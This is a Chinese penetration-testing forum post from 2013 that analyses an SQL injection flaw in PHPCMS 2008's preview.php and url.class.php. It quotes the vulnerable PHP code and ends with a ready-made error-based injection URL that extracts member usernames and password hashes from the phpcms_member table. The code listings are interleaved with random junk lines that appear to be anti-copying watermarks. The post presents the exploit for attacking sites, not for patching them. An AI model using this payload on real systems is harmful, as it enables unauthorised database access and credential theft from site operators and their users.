中国网络渗透测试联盟
标题:
PHPCMS 2008 最新漏洞(第二季)附EXP
[打印本页]
作者:
admin
时间:
2013-4-19 19:17
标题:
PHPCMS 2008 最新漏洞(第二季)附EXP
说好的第二季来了......
) ?& t! k- w* N+ i# k) g( F' h# ]' \
! V1 W4 l7 w8 r f p" A: s
要转摘的兄弟们,你们还是带个版权吧!
" J" j0 ^. J y; I4 x) O8 {, K
- P0 G ^! O) m2 X! {2 e( f- h1 X
组织 :
http://www.safekeyer.com/
(欢迎访问)
/ P! Z% R! C: t3 B# `, H7 m
6 o: z3 `& m1 |) U% {
author: 西毒 blog:
http://hi.baidu.com/sethc5
5 A$ l: c" ^$ x N; Z9 [
3 r' O9 K! O. e# @4 H
' x a- u# I. j0 w+ b7 D9 c
6 d Q$ ^3 |+ C& D7 @
其实还是有蛮多漏洞的,只是我一步步来吧!你们别催,该放的时候自然就会放了.
1 M& N! C7 ]+ U
6 f* K+ r; p: d. Y8 D* _/ Q
过程不明显的我就省略了。
. N. ?6 y' a( l2 G% S
7 } H+ x7 c( Q! }+ ?8 _
在preview.php 中第7行
# i- _# p! W- Z5 R
& [5 [ x2 M4 v# K) G9 X
$r = new_stripslashes($info);
; G# \: \% {- \% ]1 k% |
# T) f6 q3 {2 j" B' g
我们跟踪new_stripslashes这个函数
+ U0 [- T0 a" M6 z( B
7 v! a' o! _5 q+ P+ T4 |( |
在global.func.php中可以找到
! @) a3 r$ i% U
, p. \% \% f4 O. b' q1 d* i# S- @
1
* \0 \! ^1 G% ]5 C+ |3 ?9 p% v" N
2
- r- y7 t q# F0 ~! u& q, r
3
# O9 j4 s1 ?5 I# w' p
4
! O* p* b; g4 w6 s
5
# n# J. x3 }' a: Z
6 function new_stripslashes($string)
8 x& b+ o+ K+ p1 f
{
2 N+ ~$ p( k0 |1 s
if(!is_array($string)) return stripslashes($string);
9 n- Y2 W1 k/ l3 p5 @$ }
foreach($string as $key => $val) $string[$key] = new_stripslashes($val);
5 J* E8 z/ l/ Z1 \7 U) q' m' ~+ N) I/ o
return $string;
( m9 q" V1 O! ^& F5 O. a
}
8 U# {# C! e P: l" l
6 I) i# r3 N+ [$ l$ `7 G6 n' Q
这个函数的功能不用解释了吧
) H# F8 V# l; F1 G& ]1 S) O# n& v' ]
8 ?0 F9 t- t* O) o
所以我们看具体应用点再哪?
4 e4 g: z4 l- @4 ~( z
6 {6 j: W- k% K
1
6 l7 d& r, W( R& R
2
( b1 k* D/ Y3 D: Z: R/ _3 D' K
3
# A1 [/ C! Q- y/ H; c) l
4
7 j: B& O9 j: D" X, N8 j
5
$ A9 }: j' ?/ A
6
# W" b! s1 Q2 I; F5 u/ I
7
' G3 {, I, j# _: B& P2 w
8
( {7 N: X; e' I; k
9
, i0 ~( \ h1 |0 v3 ^% P& p+ A: `0 Q H
10
+ z0 F- {3 u! D& w" m
11
0 d! l3 Z2 b; a- c0 t I# p$ D
12
3 Q& a9 G0 g, j4 y4 f
13
* q( q# M) x E& Q- _
14
% |- n: y4 y5 p. j3 a; |
15
2 T/ k* l7 `$ P
16
. N" ^( Q" C* g. l# E s+ ^, _: _
17
- {+ k" l; T v1 \ l5 U; Q& g
18
# q1 a: q& L* t3 w6 P Y& j
19
. _2 C+ Q! L$ X$ S
20
0 ^' ?: ^ |6 c R' R& O- Z
21
j) y7 d4 r7 I) C) F4 S
22
* a5 C: R8 q- Y3 c# ~# g
23
7 W2 x" L3 `3 C: s
24
1 Z+ g, x Q$ W# A+ {& p/ u( c" l# u
25
5 m! Y# n" Q) L* T$ V2 Q
26
# K4 Z) c7 F7 y: p: z
27
& h6 ?2 d. v% U2 g' ^
28
8 p2 x- } }1 R4 Q# b2 o* w# Y+ _
29
) B3 ?% `2 ~! n- [! k( r
30
0 n E- q; [! `+ f a
31
$ q% ? X. B. e+ h
32
" U! Y% a. T8 g: q5 ]% T# E# U
33
+ \. p# |5 \7 p/ c2 H* v% y
34
; L; b8 P9 H! w3 R* Z- @0 @4 d7 f
35 require dirname(__FILE__).'/include/common.inc.php';
3 N: E" x8 L6 p8 |* {3 h
if(!$_userid) showmessage('禁止访问'); // 所以前提是我们注册个会员就ok了.
$ @! J$ ~' ]) {( G* V
require_once CACHE_MODEL_PATH.'content_output.class.php';
- o& q; f# j( \% n* i5 j
require_once 'output.class.php';
; b0 j3 q* L( N0 K& O& v
if(!is_array($info)) showmessage('信息预览不能翻页');//这里将要带进来我们的危险参数了
! Y+ D: _* Y. }, x6 n
$r = new_stripslashes($info); //反转义了.....关键
+ j7 v( x: E) n
$C = cache_read('category_'.$r['catid'].'.php');
1 H8 f* H; @8 C" P
$out = new content_output();
! M1 K' P2 i1 C; p# e
$r['userid'] = $_userid;
- X3 P* C1 ^7 u
$r['inputtime'] = TIME;
& @3 r" \& h5 D1 X
$data = $out->get($r);
0 T7 O# |9 r$ U6 s! V+ Y9 O5 E
extract($data);
3 c+ V- g* q: R- @7 `8 l _
$userid = $_username;
. ~. [7 m2 t0 I W a$ v" q
for($i=1;$i<10;$i++)
- K5 U; r/ ?9 n! F
{
. m6 z- b& b6 S7 Z6 @/ N. R' \
$str_attachmentArray[$i] = array("filepath" => "images/preview.gif","description" => "这里是图片的描述","thumb"=>"images/thumb_60_60_preview.gif");
6 E; Y7 w3 n+ I' {. e! `
}
. _# S X+ E5 G$ R
+ G* I5 t/ ~( j0 W
$array_images = $str_attachmentArray;
5 _8 Z* k: l" ]9 \% @
$images_number = 10;
% N Y2 {. ?- m1 z, D2 ]
$allow_priv = $allow_readpoint = 1;
1 O4 E/ l7 N& h* S t& M
$updatetime = date('Y-m-d H:i:s',TIME);
' ^) U8 F; R z
+ O: l# l! E; M& l$ {+ r( F% Q! Y* m4 v
$page = max(intval($page), 1);
/ n' k8 |" X% l
$pages = $titles = '';
2 q: F2 J2 O- A2 G: r
if(strpos($content, '') !== false) //这里必须还有这个这个字符.....才能操作哈
* b( p1 {; @. x
{
l; B5 t& M0 ^; y8 f
require_once 'url.class.php';
- e( V; t& A8 g8 m( l: v0 a7 }! {
$curl = new url();
$ H, G, x: x3 z8 I2 U
$contents = array_filter(explode('', $content));
( b; w- L7 C3 n# d) N$ [
$pagenumber = count($contents);
2 y4 y. Z7 n2 S( h% q" e
for($i=1; $i<=$pagenumber; $i++)
, a, |' q! o6 m l3 {
{
6 K6 M- h8 Z* @
$pageurls[$i] = $curl->show($r['contentid'], $i, $r['catid'], $r['inputtime']);//这里contentid进入SQL语句当中
4 O" H0 c+ M+ a# `) E8 _! |
}
2 C, o8 i& P( K& P9 T: P+ H
其中细节我就不说了...
% m8 C; z: ]9 n
: x1 J T' _. [* k
我们看看这个$curl资源句柄中的show方法
5 c# ^0 ~0 w9 ]
$ K6 M- \, X) F2 r' y
1 $pageurls[$i] = $curl->show($r['contentid'], $i, $r['catid'], $r['inputtime']);
& T4 f8 a/ n4 T% j! q" m: j1 I/ @
$ ]! E. y7 Q/ e* {: W9 h9 m( V
1
3 U" Y6 E0 {5 M+ }/ H
2
/ n" V* v! E( _
3
, t0 W# ^" e* @2 Z# L
4
) w0 O2 @$ i7 j
5
( i: l3 P$ \5 ~7 \8 d, `! e, m
6
# P, ]. d+ v+ Z/ r" R7 b
7
# f' m" q, k. Y5 b/ r
8 function show($contentid, $page = 0, $catid = 0, $time = 0, $prefix = '')
. t8 G4 f( K. w7 j0 W
{
- S6 T0 B3 |, H" I9 c
global $PHPCMS;
% J5 ~/ k* p# Z) T+ [+ m. W
if($catid == 0 || $time == 0 || $prefix == '')
; `% j: s- v) M3 B; U
{
@; S! i! Y! v% O H, R
$r = $this->db->get_one("SELECT * FROM `".DB_PRE."content` WHERE `contentid`='$contentid'");
0 E. g q4 i) G3 ?
if($r['isupgrade'] && !empty($r['url']))
' ?4 I8 r% q- s) ?" u! d
{
; B* n4 {* A) o. q* A M9 W6 O+ i% P
$ D+ `$ ^- ^2 J; [
所以结合前面的......我们x站了吧
2 V3 F( Y w5 o! x; C% o7 h
$ z" I" n, ]9 C* ?7 J
给出exp
( ^- ?( R8 ~$ H7 x8 x& ^3 @1 S1 N
; G( i* t) g- I/ i9 u: k& z. P* M8 w
www.xxxxx.com/preview.php?info
[catid]=15&content=ab&info[contentid]=2' and (select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)-- a
' e z- J b( M F. g
6 ]8 L2 Z- @: `$ V# @
截图看一下
/ M3 r; t0 m, v/ T( H4 W
8 {2 V0 f+ h5 ^! Z
最后真心说句,360收购漏洞计划,价格真心低.....
: r8 w T- G5 z v8 I3 Y& K
http://www.myhack58.com/Article/UploadPic/2013-4/2013419151239428.jpg
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2